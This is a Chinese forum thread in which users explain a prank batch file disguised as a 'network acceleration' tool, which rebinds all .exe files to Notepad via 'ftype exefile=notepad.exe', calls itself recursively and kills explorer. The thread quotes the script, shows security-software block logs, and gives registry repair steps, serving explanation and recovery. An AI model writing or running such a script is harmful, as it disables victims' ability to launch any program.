一个批处理文件执行后。能黑360，打开360变成记事本，连浏览器都打不开

王百万

一个批处理文件执行后。能黑360，打开360变成记事本，连浏览器都打不开 求会代码的大神解释下为什么

fireherman

不怕死你就执行.bat
echo 实行网络加速	显示“实行网络加速”
ping 127.0.0.1 -n 3 >nul	连接本机地址（IP）3次到空文件
echo 加速成功	显示“加速成功”
echo 空格键双倍加速	显示“空格键双倍加速”
pause	暂停，按任意键继续
ftype exefile=notepad.exe	把EXE（可执行文件）关联到记事本（文本文件）
echo 你中计啦	显示“你中计啦”
start=c.bat	运行 c.bat（另外一个批处理文件）
c.bat
star=c.bat	（应该是start=c.bat吧？）递归调用（自己调用自己，自己运行自己）
taskkill /f /im explorer.ex	强制终止explorer.exe系统文件

这是一个恶作剧的批处理吗？

zmyx279323199

修改关联文件的

shulun743

这个就是 秘密 ，它将 exe 关联了 记事本

vm001

需要右键管理员运行才可以执行

skyboybone

左手

2016-9-14 21:56:27    创建新进程 风险级别:未知    允许
进程: c:\windows\explorer.exe
目标: c:\windows\system32\cmd.exe
命令行: C:\WINDOWS\system32\cmd.exe /c ""C:\Documents and Settings\Administrator\桌面\不怕死你就执行.bat" "
规则: [应用程序]c:\windows\explorer.exe -> [子应用程序]→终止_降权组件 -> [应用程序]c:\windows\system32\cmd.exe

2016-9-14 21:56:28    创建新进程 风险级别:未知    阻止
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\conime.exe
命令行: C:\WINDOWS\system32\conime.exe
规则: [应用程序组]→终止_降权组件

2016-9-14 21:56:33    修改注册表值 风险级别:未知    阻止并结束进程
进程: c:\windows\system32\cmd.exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
值: notepad.exe
规则: [应用程序组]→终止_降权组件 -> [注册表]*

王百万

fireherman 发表于 2016-9-14 16:14
这是一个恶作剧的批处理吗？

是的，不过这个有点过了，弄了半天才搞定

王百万

shulun743 发表于 2016-9-14 17:15
这个就是 秘密 ，它将 exe 关联了 记事本

有没有非常简单的方法改回来，而且执行后我的火狐和谷歌浏览器被删除了，什么鬼

fireherman

王百万 发表于 2016-9-14 23:13
有没有非常简单的方法改回来，而且执行后我的火狐和谷歌浏览器被删除了，什么鬼

其实上面的回复里已经给了你启示：

打开注册表（开始 - 运行 - RegEdit）

定位键值
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command

把键值 notepad.exe 删除，还原为：



如果你只是执行了你主楼里的批处理文件（不怕死你就执行.bat），那么火狐和Chrome浏览器应该是不会被删除的，只不过他们的EXE文件变成打开记事本。

你修改了上面的键值，重启电脑，所有EXE文件都会回来了。